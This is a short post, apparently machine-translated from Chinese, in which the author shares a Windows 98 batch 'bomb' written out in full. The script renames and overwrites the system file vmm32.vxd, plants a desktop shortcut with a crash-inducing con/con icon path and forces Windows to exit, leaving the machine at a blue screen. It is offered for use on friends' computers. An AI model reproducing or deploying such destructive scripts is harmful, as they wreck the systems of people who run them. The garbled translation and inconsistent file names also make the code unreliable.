I also bomb

zhaozj2021-02-16  85

Many netizens asked me, what good bombs, how to fry the computer, etc. I also held my thoughts got to get to my friends, I wrote a batch bomb in a few minutes, (only useful for Windows98). Save the following source program as feng.bat ------------------------------------- @REM @echo off smartdrv C: /Windows/system/vmm32.vxd c: /windows/system/vmm32/vmm32.vxd ren c: /windows/system/vmm32.vxd feng.vxd echo hackerfeng> C: / Windows / SYSTEM /Vmm32.vxd echo del c: /windows/system/vmm32.vxd> c: /windows/system/vmm32/.bat echo ren c: /windows/system/fng.vxd vmm32.vxd >> C: / Windows / System / VMM32 / 1119.Bat Echo del C: /Windows/desktop/FENG.URL >> C: /Windows/system/vmm32/1119.bat echo [Internetshortcut]> C: /Windows/desktop/feng.txt echo url = http: // >> C: /Windows/desktop/FENG.TXT Echo iconindex = 1 >> C: /Windows/desktop/fng.txt echo iconfile = c: /con/con.dll >> c : / windows/desktop/fng.txt ren c: /windows/desktop/feng.txt feng.url echo on ***************** Feng ***** ***************** * * * www.yangtai.ip.com * * * ****************** ********************************* 0 ==== {=========== > Rundll32.exe User.exe, exitwindows cls If anyone misuse can be used to enter DOS (for security, I didn't add "bootkeys = 0" to MS-dos.sys, or not ¥% ## ·), run C: /Windows/system/vmm32/feng.bat If Founded. After BAT, the cover is installed in the WIN98, and the system enters the desktop blue screen.


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